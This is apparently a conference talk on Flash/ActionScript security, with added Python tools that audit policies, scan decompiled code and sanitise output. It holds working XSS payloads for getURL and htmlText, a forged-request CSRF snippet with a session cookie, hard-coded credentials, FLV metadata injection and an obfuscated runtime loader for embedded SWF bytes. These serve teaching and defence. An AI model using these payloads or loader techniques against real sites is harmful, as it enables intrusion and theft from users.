INTRODUCTION

Flash and ActionScript

Flash

- Over a decade old
- Ten versions so far
- Changes in security model

ActionScript

- Flash language
- Three versions
- AS 2.0 & AS 3.0 differences
INFORMATION DISCLOSURE

Picture Perfect

[Screenshot: a Flash application (application/x-shockwave-flash object) loaded in Mozilla Firefox; its menu lists items such as Earthquake Preparedness, Maintenance Standards, Combating Graffiti and Budgeting for Equipment]

Client-Side Authentication
Behind the scenes

Decompiled ActionScript 2.0 behind the login form: every user name and password is compared against string literals embedded in the SWF, so anyone who downloads the file can read them.

on (release, releaseOutside, keyPress '<Enter>') {
    if (user eq 'ccfsa' and password eq 'secure') {
        gotoAndPlay('user1');
    } else {
        if (user eq 'user2' and password eq 'pass2') {
            gotoAndPlay('user2');
        } else {
            if (user eq 'user3' and password eq 'pass3') {
                gotoAndPlay('user3');
            } else {
                if (user eq 'user4' and password eq 'pass4') {
                    gotoAndPlay(80);
                } else {
                    if (user eq 'user5' and password eq 'pass5') {
                        gotoAndPlay(70);
                    } else { ...
[Screenshots: decompiled login handlers from further public SWFs; each compares the password against a string literal and calls getURL() to a client page, with the site URLs blacked out on the slides]
Out of approx. 150 Google results for the query

    filetype:swf inurl:login OR inurl:secure OR inurl:admin

23 SWF applications revealed login credentials.
Who needs credentials

[Screenshot: the decompiled password branches, each ending in a getURL() call whose destination, the per-client page URL, is visible in clear text]
CROSS-DOMAIN COMMUNICATION

Black Hat Briefings
Security Model

Sandboxing model

- Sandboxes: logical security groupings that Flash Player uses to contain resources
- Resources in the same security sandbox (local or network) can always access each other
- Resources in a remote sandbox can never access local resources
- Exact domain match. Each of the following resides in a separate sandbox:

    http://a.com
    http://www.a.com
    http://www.a-b.com
    https://www.a.com
[Figure: Sandbox Model. The a.com sandbox contains File a3 and File a4; the b.com sandbox contains File b3 and File b4; the arrows run only between files inside the same sandbox]
Cross-domain communication

- Cross-domain policy files
  - Types of policy files
    - Meta policy files
    - Master policy file
    - Socket policy files
  - Purpose of a policy file
  - Abusing policy file usage
[Screenshot: Firefox showing the master policy file at http://www.<site>.com/crossdomain.xml]

<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>

crossdomain.xml
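Added example (not from the original deck): a small Python checker for the two rules just described, the exact-match sandbox test and the crossdomain.xml evaluation. The two policies are constructed samples; the handling of "*.example.com" wildcards is an assumption noted in the code, and the allowed-host logic is mine, not Flash Player's implementation.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample policies (not copied from any real site).
PERMISSIVE_POLICY = """<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""

RESTRICTED_POLICY = """<cross-domain-policy>
  <allow-access-from domain="www.a.com"/>
  <allow-access-from domain="*.partner-a.com"/>
</cross-domain-policy>"""


def same_sandbox(url1, url2):
    """Flash Player's sandbox rule: scheme and host must match exactly,
    so http://a.com, http://www.a.com and https://www.a.com are all distinct."""
    a, b = urlsplit(url1), urlsplit(url2)
    return (a.scheme, a.hostname) == (b.scheme, b.hostname)


def domain_matches(pattern, host):
    """Match one allow-access-from domain attribute against a requesting host.
    Assumption: '*.example.com' covers example.com itself and every subdomain."""
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return pattern == host


def policy_allows(policy_xml, requesting_origin):
    """Would a SWF served from requesting_origin be allowed to read this site's data?"""
    host = urlsplit(requesting_origin).hostname
    root = ET.fromstring(policy_xml)
    return any(domain_matches(rule.get("domain", ""), host)
               for rule in root.findall("allow-access-from"))


def audit_policy(policy_xml):
    """Return the findings a reviewer should raise about a crossdomain.xml."""
    findings = []
    for rule in ET.fromstring(policy_xml).findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('domain="*": any SWF on the web can read responses sent with the user\'s cookies')
        elif domain.startswith("*."):
            findings.append(f'domain="{domain}": every host under {domain[2:]} is trusted, including ones you do not control')
        if rule.get("secure", "").lower() == "false":
            findings.append(f'secure="false" on {domain}: an http:// SWF may read https:// data')
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, "allows evil.example:", policy_allows(policy, "http://evil.example"))
        for finding in audit_policy(policy):
            print("  -", finding)
```

Run it against a site's real policy file and the wildcard entry is the one that turns the CSRF on the next slides into a read-back of the victim's data: with domain="*" any SWF hosted anywhere can load the site's pages with the user's cookies attached.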
CROSS-SITE REQUEST FORGERY

[Screenshot: the account settings page of the "@n0nym0us's Channel" test account on the site whose crossdomain.xml allows any domain; the form holds City (atlanta), State/Province (Georgia), Country or Region (United States), Zip/Postal Code (30313), Daytime Phone and Cellular Phone, each with a "Make ... public" option]
The ActionScript 3.0 that submits the forged settings update (site name blacked out on the slide):

private function load():void {
    var request:URLRequest = new URLRequest("http://www.<redacted>.com/index.php?<redacted>");
    request.method = URLRequestMethod.POST;
    var variables:URLVariables = new URLVariables("phoneNumberWork=7703437070");
    request.data = variables;
    try {
        navigateToURL(request, "_self");
    } catch (error:Error) {
        trace("Unable to load requested document.");
    }
}
The request as the browser sends it, with the victim's session cookies attached:

POST /index.php?<redacted> HTTP/1.1
Host: www.<redacted>.com
Cookie: dsavip=3316650156.20480.0000; PHPSESSID=a981d67f85ff4c296fa502a94331181d; User={...}; s_cc=true; ...; md={"senderName":"@n0nym0us","senderEmail":"fakeadress@fraud.com"};

phoneNumberWork=7703437070
[Screenshot: the same account settings page (http://www.<site>.com/account/my_settings/) reloaded after the forged POST]
CROSS-SITE SCRIPTING

XSS - Root causes

Uninitialized Variables

- Any uninitialized variable (_root.*, _global.*, _level0.*) can be assigned values via query parameters.

Injection points

- getURL function
- htmlText property
- load*
getURL - URL parameter

getURL(url [, window [, "variables"]])

Execute script code:

getURL(javascript:code, '_self')

Example

on (release) {
    getURL("javascript:alert('XSS')");
}
[Screenshot: http://localhost/TestFlash/TestFlash.html loaded in Mozilla Firefox]

getURL - variables parameter
getURL(url [, window [, "variables"]])

- variables: A GET or POST method for sending variables. The GET method appends the variables to the end of the URL, and is used for small numbers of variables.

Example

getURL("javascript:void(0)", "_self", "GET");

With GET, Flash appends the SWF's own query-string variables to the URL, so the uninitialized variable a travels into the javascript: URL:

http://host/XSS.swf?a=0:0;alert('XSS')
javascript:void(0)?a=0:0;alert('XSS')
[Screenshot: http://localhost/TestFlash/TestFlash.swf?a=0:0;alert('XSS') loaded in Mozilla Firefox; the browser shows the dialog "The page at http://localhost says: XSS"]
HTML Injection

Supported tags (from Adobe)

- Anchor: <a href="/support/flash/ts/documents/url">
- Bold: <b>, Italic: <i>
- Font: <font [color="#xxxxxx"] [face="Type Face"] [size="Type Size"]>
- Paragraph: <p [align="left"|"right"|"center"]>
- Underline: <u>, Break: <br>
- Image: <img src="/images/flash/dogs.jpg"/>
- List Item: <li>, Span: <span>
- TextFormat: <textformat>
Anchor Tag

<a href='javascript:code'>
<a href='asfunction:function, arg'>
<a href='asfunction:System.Security.allowDomain, evilhost'>

this.createTextField("txtBranchAddress", this.getNextHighestDepth(), 10, 10, 200, 200);
txtBranchAddress.html = true;
txtBranchAddress.htmlText = _root.branch + "\r\n" + branchAddresses[_root.branch];

- http://host/contact.swf?branch=<a href='javascript:alert("XSS")'>
[Screenshot: contact.swf?branch=%3Ca%20href='javascript:alert(%22XSS%22)'%3E loaded in Mozilla Firefox; the text field shows "undefined" and the browser displays the dialog "The page at http://localhost says: XSS"]
Image Tag

this.createTextField("txtBranchAddress", this.getNextHighestDepth(), 10, 10, 200, 200);
txtBranchAddress.html = true;
txtBranchAddress.htmlText = _root.branch + "\r\n" + branchAddresses[_root.branch];

Exploits

- <img src='javascript:code//.jpg'>
- <img src='asfunction:function, arg .jpg'>

http://host/contact.swf?branch=<img src='asfunction:getURL, javascript:alert("XSS") .jpg'>
Sensitive APIs

loadVariables, loadVariablesNum, MovieClip.loadVariables, LoadVars.load, LoadVars.sendAndLoad
XML.load, XML.sendAndLoad
URLLoader.load, URLStream.load
LocalConnection
ExternalInterface.addCallback
SharedObject.getLocal, SharedObject.getRemote
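Added example (not SWFScan's code and not from the deck): a Python source-sink scan over decompiled ActionScript 2.0 of the kind a reviewer can run on Flare output. It treats _root/_global/_level0 members and variables that are never assigned as attacker-controlled sources, and getURL, htmlText, the load* APIs above and allowDomain as sinks; it also flags the hard-coded credential pattern from the information disclosure section. SAMPLE_AS2 is constructed from the patterns on the earlier slides, and the regular expressions are a heuristic of mine, not Flash semantics.

```python
import re

# Constructed decompiled ActionScript 2.0, modelled on the patterns shown in this deck.
SAMPLE_AS2 = """\
var branchAddresses:Object = {hq: "1 Main St"};
on (release, keyPress '<Enter>') {
  if (user eq 'admin' and password eq 's3cret') {
    gotoAndPlay('admin');
  }
}
txtBranchAddress.html = true;
txtBranchAddress.htmlText = _root.branch + "\\r\\n" + branchAddresses[_root.branch];
getURL("javascript:void(0)", "_self", "GET");
getURL(clickTag, '_self');
loadVariables(_level0.dataURL, this);
System.security.allowDomain("*");
var safeUrl:String = "http://www.a.com/data.txt";
loadVariables(safeUrl, this);
"""

SINKS = ("getURL", "loadVariablesNum", "loadVariables", "loadMovieNum", "loadMovie",
         "sendAndLoad", "load", "allowDomain")
BUILTINS = {"this", "true", "false", "null", "undefined"}
STRING_LITERAL = re.compile(r"'[^']*'|\"[^\"]*\"")


def assigned_names(src):
    """Names given a value somewhere in the SWF; anything else is query-string settable."""
    names = set(re.findall(r"\bvar\s+(\w+)", src))
    names |= set(re.findall(r"(?<![\w.])(\w+)\s*=(?!=)", src))
    return names


def tainted_refs(expr, assigned):
    """Identifiers in expr that the query string controls: _root/_global/_level0
    members, and bare variables never assigned in the file."""
    refs = [m.group(0) for m in re.finditer(r"(_root|_global|_level0)\.\w+", expr)]
    for m in re.finditer(r"(?<![\w.])([A-Za-z_]\w*)(?![\w(])", STRING_LITERAL.sub("", expr)):
        name = m.group(1)
        if name not in assigned and name not in BUILTINS and not name.startswith("_"):
            refs.append(name)
    return list(dict.fromkeys(refs))          # de-duplicate, keep order


def scan(src):
    """Return (line, category, detail) findings for hard-coded credentials and
    source-to-sink flows into getURL, htmlText, load* and allowDomain."""
    assigned = assigned_names(src)
    findings = []
    sink_call = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*)\)")
    for lineno, line in enumerate(src.splitlines(), 1):
        if re.search(r"\b(password|passwd|pwd)\w*\s*(eq|==)\s*['\"]", line, re.I):
            findings.append((lineno, "information disclosure",
                             "password compared against a string literal"))
        m = re.search(r"\.htmlText\s*\+?=\s*(.+);", line)
        if m:
            for ref in tainted_refs(m.group(1), assigned):
                findings.append((lineno, "xss", f"htmlText built from {ref}"))
        for m in sink_call.finditer(line):
            sink, args = m.group(1), m.group(2)
            if sink == "allowDomain" and '"*"' in args:
                findings.append((lineno, "cross-domain", 'allowDomain("*") trusts every domain'))
            if sink == "getURL" and "javascript:" in args and re.search(r"['\"]GET['\"]", args):
                findings.append((lineno, "xss",
                                 "getURL with a javascript: URL and GET appends every query variable to the script"))
            for ref in tainted_refs(args, assigned):
                findings.append((lineno, "xss" if sink == "getURL" else "untrusted load",
                                 f"{sink}() called with {ref}"))
    return findings


if __name__ == "__main__":
    for lineno, category, detail in scan(SAMPLE_AS2):
        print(f"line {lineno}: [{category}] {detail}")
```

The last two lines of the sample show the negative case: loadVariables(safeUrl, this) is not reported because safeUrl is assigned a literal inside the SWF, which is the distinction a source-sink analysis has to make to avoid drowning developers in false positives.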
ARE WE CRYING WOLF???

Fact Check

ClickTag

- getURL(clickTag, '_self')
- Of 200 results for Google query 'filetype:swf inurl:clickTag', 120 were found to be vulnerable to XSS.
- Only 18 (9%) used validation

XSS in automatically generated SWFs

- SWFs generated by authoring tools (Adobe Dreamweaver, Adobe Connect, Macromedia Breeze, Techsmith Camtasia, Autodemo, and InfoSoft FusionChart) contained XSS vulnerabilities
Widespread Incidents

Adobe Dreamweaver
- skinName parameter: load arbitrary URLs

Adobe Acrobat Connect/Macromedia Dreamweaver
- baseURL parameter of controller main.swf: load arbitrary URLs

Infosoft FusionCharts
- dataURL: HTML injection into textarea

Techsmith Camtasia
- csPreloader: load arbitrary Flash file

Google queries for these parameters result in over 3000 hits
DATA INJECTION

Flash Video

Metadata

- length/duration of video, frame rate, video/audio data rates

onMetaData (NetStream.onMetaData handler)

- triggered after a call to the NetStream.play() method
Vulnerable Code

Every metadata value of the FLV is concatenated into an HTML-enabled text field without escaping:

this.createTextField("txtMetadata", this.getNextHighestDepth(), 10, 10, 500, 500);
txtMetadata.html = true;

var nc:NetConnection = new NetConnection();
nc.connect(null);
var ns:NetStream = new NetStream(nc);

ns.onMetaData = function(infoObject:Object) {
    for (var propName:String in infoObject) {
        txtMetadata.htmlText += propName + " = " + infoObject[propName];
    }
};

ns.play("http://localhost/TestFlash/water.flv");
Writing markup into the FLV metadata with flvtool2:

C:\Documents and Settings\jagdale\Desktop\TestFlashAppsRW\flvtool2-1.0.6>flvtool2.exe -U -videodatarate:"<a href='javascript:alert(123)'>Click here to calculate the videodatarate</a>" C:\Inetpub\wwwroot\TestFlash\water.flv
Dumping the metadata back out:

C:\Documents and Settings\jagdale\Desktop\TestFlashAppsRW\flvtool2-1.0.6>flvtool2.exe -P C:\Inetpub\wwwroot\TestFlash\water.flv
--- C:/Inetpub/wwwroot/TestFlash/water.flv:
audiodatarate:
cuePoints:
hasKeyframes: true
hasVideo: true
framerate: 14
canSeekToEnd: true
stereo:
lasttimestamp: 7.347
datasize: 387851
videocodecid: 4
audiosamplerate:
audiosize:
audiosamplesize:
videosize: 386977
audiodelay:
hasAudio: false
filesize: 388312
height: 215
lastkeyframetimestamp: 7.347
metadatacreator: inlet media FLVTool2 v1.0.6 - http://www.inlet-media.de/flvtool2
metadatadate: Wed Oct 8 09:18:34 GMT-0400 2008
duration: 7.414
videodatarate: <a href='javascript:alert(123)'>Click here to calculate the videodatarate</a>
audiocodecid:
[Screenshot: TestFlash.swf loaded from http://localhost/TestFlash/TestFlash.swf. The text field lists the metadata (width = 320, hasCuePoints = false, framerate = 14, filesize = 388312, duration and the rest); the videodatarate entry renders as the link text "Click here to calculate the videodatarate", and clicking it opens an alert box reading 123]
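Added example (not from the deck, and not flvtool2): a Python script that builds a minimal FLV carrying an onMetaData script tag, parses it back the way a player would, and flags metadata strings that carry markup or a script scheme, which is the check a server should run on uploaded video before an HTML-enabled text field ever sees the values. The AMF0 encoder and decoder cover only the types onMetaData uses (number, boolean, string, ECMA array), and the sample metadata is constructed to mirror the flvtool2 injection above.

```python
import re
import struct

MARKUP = re.compile(r"<|javascript:|asfunction:", re.I)


def amf0_encode(value):
    """Minimal AMF0 encoder: number, boolean, string and ECMA array (dict)."""
    if isinstance(value, bool):
        return b"\x01" + (b"\x01" if value else b"\x00")
    if isinstance(value, (int, float)):
        return b"\x00" + struct.pack(">d", float(value))
    if isinstance(value, str):
        data = value.encode("utf-8")
        return b"\x02" + struct.pack(">H", len(data)) + data
    if isinstance(value, dict):
        out = b"\x08" + struct.pack(">I", len(value))
        for key, item in value.items():
            kb = key.encode("utf-8")
            out += struct.pack(">H", len(kb)) + kb + amf0_encode(item)
        return out + b"\x00\x00\x09"          # empty key + object-end marker
    raise TypeError(f"unsupported value {value!r}")


def build_flv(metadata):
    """Constructed FLV: 9-byte header, PreviousTagSize0, one onMetaData script tag."""
    body = amf0_encode("onMetaData") + amf0_encode(metadata)
    tag = (b"\x12" + len(body).to_bytes(3, "big")      # type 18 = script data, DataSize
           + b"\x00\x00\x00\x00" + b"\x00\x00\x00"      # Timestamp(+ext), StreamID
           + body)
    header = b"FLV\x01\x05" + struct.pack(">I", 9)
    return header + struct.pack(">I", 0) + tag + struct.pack(">I", len(tag))


def amf0_decode(buf, pos):
    """Decode one AMF0 value at pos; returns (value, new_pos)."""
    marker, pos = buf[pos], pos + 1
    if marker == 0x00:
        return struct.unpack(">d", buf[pos:pos + 8])[0], pos + 8
    if marker == 0x01:
        return buf[pos] != 0, pos + 1
    if marker == 0x02:
        n = struct.unpack(">H", buf[pos:pos + 2])[0]
        return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
    if marker == 0x08:
        pos += 4                                  # declared count; the end marker is authoritative
        obj = {}
        while buf[pos:pos + 3] != b"\x00\x00\x09":
            n = struct.unpack(">H", buf[pos:pos + 2])[0]
            key = buf[pos + 2:pos + 2 + n].decode("utf-8")
            obj[key], pos = amf0_decode(buf, pos + 2 + n)
        return obj, pos + 3
    raise ValueError(f"unsupported AMF0 marker 0x{marker:02x}")


def read_onmetadata(flv):
    """Walk the FLV tags and return the onMetaData object, or {} if absent."""
    if flv[:3] != b"FLV":
        raise ValueError("not an FLV file")
    pos = struct.unpack(">I", flv[5:9])[0] + 4       # header length + PreviousTagSize0
    while pos + 11 <= len(flv):
        tag_type = flv[pos]
        size = int.from_bytes(flv[pos + 1:pos + 4], "big")
        data = flv[pos + 11:pos + 11 + size]
        if tag_type == 0x12:
            name, p = amf0_decode(data, 0)
            if name == "onMetaData":
                return amf0_decode(data, p)[0]
        pos += 11 + size + 4                          # tag header + data + PreviousTagSize
    return {}


def suspicious_metadata(metadata):
    """Keys whose string values carry markup or a script scheme; rendering these
    through an htmlText field is exactly the bug in the vulnerable code above."""
    return sorted(k for k, v in metadata.items() if isinstance(v, str) and MARKUP.search(v))


# Constructed sample mirroring the flvtool2 injection on this slide.
SAMPLE_FLV = build_flv({
    "duration": 7.414,
    "framerate": 14,
    "hasAudio": False,
    "metadatacreator": "constructed sample",
    "videodatarate": "<a href='javascript:alert(123)'>Click here to calculate the videodatarate</a>",
})

if __name__ == "__main__":
    meta = read_onmetadata(SAMPLE_FLV)
    print("fields:", sorted(meta))
    print("unsafe fields:", suspicious_metadata(meta))
```

The point of going through the bytes rather than trusting a tool's listing is that videodatarate is declared numeric by convention only; AMF0 lets any key carry a string, so the player-side handler must treat every value as untrusted text.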
FLASH MALWARE

Malvertisement

Jul 2006
- MySpace ad injects malware into 1.07 million computers

Feb 2007
- Malware found in Windows Live Messenger ads

Sep 2007
- Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users (also affected TheSun.co.uk, Bebo.com and UltimateGuitar.com)

Nov 2007
- Whitepages online and Bigpond ads 'hijack' users

Dec 2007
- Hackers Use Banner Ads on Major Sites to Hijack Your PC (The Economist, MLB.com, Canada.com etc), redirect function encrypted.
- Malware bandits go looking for goals on ESPN's Soccernet.com
Malvertisement

Jan 2008
- Rogue ads infiltrate Expedia and Rhapsody
- ITV Website Forces Scareware Package Through Banner Ads

Apr 2008
- Yahoo! pimping malware from banner ads
- Fake FedEx Advertisement

Aug 2008
- 'Malvertisement' epidemic visits house of Newsweek.com
- Clipboard Hijack
  - System.setClipboard("http://www.evil.com");
  - The System.setClipboard() method allows a SWF file to replace the contents of the clipboard with a plain-text string of characters. This poses no security risk [Adobe].
Malvertisement

Bypassing Filters / Preventing Decompilation

- Obfuscation
- Runtime Instantiation
  - var instanceName = _global[<className>] (AS 2.0)
  - var name:Class = getDefinitionByName(<className>) as Class (AS 3.0)

Building the class name "LoadVars" one character at a time, so that the string never appears in the SWF:

var f = String.fromCharCode;
var a = f(76); a += f(111); a += f(97); a += f(100); a += f(86); a += f(97); a += f(114); a += f(115);
(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');

is equivalent to

(new _global['LoadVars']()).send('http://www.sift.com.au', '_parent', 'post');
Obfuscation

Functions

var f = String.fromCharCode;
var a = f(103); a += f(101); a += f(116); a += f(85); a += f(82); a += f(76);
_root[a]('http://www.sift.com.au', '_parent', 'post');

is equivalent to

getURL('http://www.sift.com.au', '_parent', 'post');
Loading code at runtime 



loader=new Loader(); 

configureListeners(loader.contentLoaderlnfo); var ba:ByteArray=new ByteArray(); 

var badware:Array= 

[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,2 

0,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, ... 

181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137 

,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29]; 

for(var i:int=0;i<badware.length;i++) 

ba.writeByte(badware[i]) ; 
loader, load Bytes(ba); 
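Added example (not from the deck): Python helpers an analyst can run over decompiled ActionScript to undo the two tricks on these slides, recovering the fromCharCode-assembled names behind _root[a] / _global[b], and spotting integer array literals whose first bytes are an SWF signature (the array above starts 67,87,83 = "CWS", a zlib-compressed SWF, version byte 7). SAMPLE_OBFUSCATED is constructed from the snippets above; the regular expressions are mine and assume the decompiler's output style shown here.

```python
import re

# Constructed decompiled ActionScript 2.0, modelled on the obfuscation shown on these slides.
SAMPLE_OBFUSCATED = """\
var f=String.fromCharCode
var a=f(103); a+=f(101); a+=f(116); a+=f(85); a+=f(82); a+=f(76);
_root[a]('http://www.sift.com.au', '_parent', 'post');
var b=f(76); b+=f(111); b+=f(97); b+=f(100); b+=f(86); b+=f(97); b+=f(114); b+=f(115);
(new _global[b]()).send('http://www.sift.com.au', '_parent', 'post');
var badware:Array=[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49];
for(var i:int=0;i<badware.length;i++) ba.writeByte(badware[i]);
loader.loadBytes(ba);
"""

SWF_MAGIC = {b"FWS": "uncompressed", b"CWS": "zlib-compressed", b"ZWS": "LZMA-compressed"}


def recover_strings(src):
    """Rebuild every string assembled from String.fromCharCode calls, keyed by variable."""
    aliases = set(re.findall(r"\bvar\s+(\w+)\s*=\s*String\.fromCharCode\b", src))
    strings = {}
    for m in re.finditer(r"\b(\w+)\s*\+?=\s*(\w+)\((\d+)\)", src):
        target, alias, code = m.group(1), m.group(2), int(m.group(3))
        if alias in aliases:
            strings[target] = strings.get(target, "") + chr(code)
    return strings


def deobfuscate(src):
    """Replace _root[x] / _global[x] / _level0[x] lookups with the recovered literal name."""
    strings = recover_strings(src)

    def replace(m):
        scope, var = m.group(1), m.group(2)
        return f"{scope}['{strings[var]}']" if var in strings else m.group(0)

    return re.sub(r"\b(_root|_global|_level0)\[(\w+)\]", replace, src)


def embedded_swfs(src):
    """Find integer array literals whose first bytes are an SWF signature; returns
    (variable name, compression, SWF version) per hit."""
    hits = []
    for m in re.finditer(r"\b(\w+)\s*(?::\w+)?\s*=\s*\[\s*(\d+(?:\s*,\s*\d+)+)\s*\]", src):
        values = [int(v) for v in m.group(2).split(",")]
        if max(values) > 255 or len(values) < 4:      # not a byte array, or too short
            continue
        data = bytes(values)
        if data[:3] in SWF_MAGIC:
            hits.append((m.group(1), SWF_MAGIC[data[:3]], data[3]))
    return hits


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_OBFUSCATED))
    print("embedded SWFs:", embedded_swfs(SAMPLE_OBFUSCATED))
```

Once the names are back, the sensitive-API list earlier in the deck applies again: getURL and LoadVars.send were hidden from a string search, not from execution, and a loadBytes() of an in-memory SWF is the signature to look for when an ad creative seems to do nothing in the decompiler.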
DEFEATING DECOMPILERS

Playing with the bytecode

push 'b'
label1:
push 'a', 3
setVariable
branch label2
branch label1
label2:

The branch label1 after the unconditional branch label2 is never executed, but a decompiler that follows both targets reconstructs a loop the player never runs.
TOOLS

Tools

Decompiler/Disassembler [Free/Open Source]

- Flare: Command line ActionScript decompiler
- Flasm: Command line assembler/disassembler
- erlswf: Erlang SWF file analysis toolkit
- SWF Decompiler: SWF decompiler
- Sothink SWF Decompiler: Commercial program to build FLA files from SWF (AS 3.0)
- Action Script Viewer: Feature rich SWF decompiler
- Flash Decompiler Trillix: SWF to FLA converter and decompiler (AS 3.0)
Tools

Obfuscation

- SWF Encrypt: Encrypts Flash SWF files
- SWC Encrypt: Encrypts Flash Component SWC files
- OBFU: Flash ActionScript 2 bytecode obfuscator
- SWF Protect: Flash ActionScript bytecode obfuscator
- DCoM SWF Protector: Flash obfuscator
SWFSCAN

What is SWFScan?

FLASH SECURITY SCANNING TOOL (designed by HP Web Security Research Group)

- Analyzes Flash applications and reports the security vulnerabilities detected
- Flash developer community education
  - Make developers aware of their coding pitfalls
- Supports ALL versions of Flash
Features

- Decompiles SWF byte code and generates ActionScript source code
- Performs source-sink analysis to understand the data flow
- Checks for known security issues
  - Information disclosure
  - Cross-Site Scripting
  - Cross-Domain Privilege Escalation
- Reports vulnerabilities found and highlights the source code block causing the vulnerability
DEMO

SECURE FLASH DEVELOPMENT
Guidelines

• VALIDATE VALIDATE VALIDATE!!!
• Avoid storing sensitive information in the SWF application
• Use SSL whenever necessary
• Secure cross-domain communications
  - Use specific domains in crossdomain.xml
  - Use sub-directory crossdomain.xml
  - Limit allowDomain() settings to specific domains
• Use proper escaping when writing to htmlText
• Review the list of sensitive APIs
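Added example (not from the deck): the contact.swf pattern from the XSS section, rewritten in Python so the unsafe and the validated-and-escaped versions can be run side by side; the logic ports line for line to ActionScript. BRANCH_ADDRESSES, the allowed host list and the helper names are assumptions, and the entity table is assumed to be the set Flash's htmlText decodes (&amp; &lt; &gt; &quot; &apos;), which is why numeric entities are not used.

```python
from urllib.parse import urlsplit

# Assumed to be the five entities Flash Player's htmlText decodes; '&' is listed first
# so that it is escaped before the entities that contain it are produced.
HTMLTEXT_ENTITIES = (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"), ('"', "&quot;"), ("'", "&apos;"))

# Constructed lookup table standing in for the deck's branchAddresses object.
BRANCH_ADDRESSES = {"hq": "1 Main St, Atlanta", "north": "2 Peach Rd, Atlanta"}

# The payload from the Anchor Tag slide (contact.swf?branch=...).
PAYLOAD = "<a href='javascript:alert(\"XSS\")'>"


def escape_htmltext(text):
    """Escape untrusted text so it can only ever render as text inside htmlText."""
    for raw, entity in HTMLTEXT_ENTITIES:
        text = text.replace(raw, entity)
    return text


def unsafe_render(branch):
    """The deck's contact.swf pattern: _root.branch concatenated into htmlText unescaped."""
    return branch + "\r\n" + str(BRANCH_ADDRESSES.get(branch))


def safe_render(branch):
    """Validate against the known branches first, then escape whatever is echoed back."""
    if branch in BRANCH_ADDRESSES:
        return escape_htmltext(branch) + "\r\n" + escape_htmltext(BRANCH_ADDRESSES[branch])
    return escape_htmltext(branch) + "\r\n" + "no such branch"


def safe_anchor(label, href, allowed_hosts=("www.a.com",)):
    """Emit an <a> only for http(s) links to an allow-listed host; javascript: and
    asfunction: hrefs never reach the tag and are rendered as plain text instead."""
    parts = urlsplit(href)
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return f"<a href='{escape_htmltext(href)}'>{escape_htmltext(label)}</a>"
    return escape_htmltext(label)


if __name__ == "__main__":
    print(repr(unsafe_render(PAYLOAD)))
    print(repr(safe_render(PAYLOAD)))
    print(safe_anchor("Contact", "asfunction:getURL, javascript:alert(\"XSS\")"))
```

Two of the guidelines are exercised at once: the branch name is validated against an allow-list before it is used as a key, and everything that is echoed back, valid or not, is escaped, so the asfunction: and javascript: schemes that the Anchor and Image Tag slides rely on never reach a tag attribute.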
QUESTIONS?

prajakta.jagdale@hp.com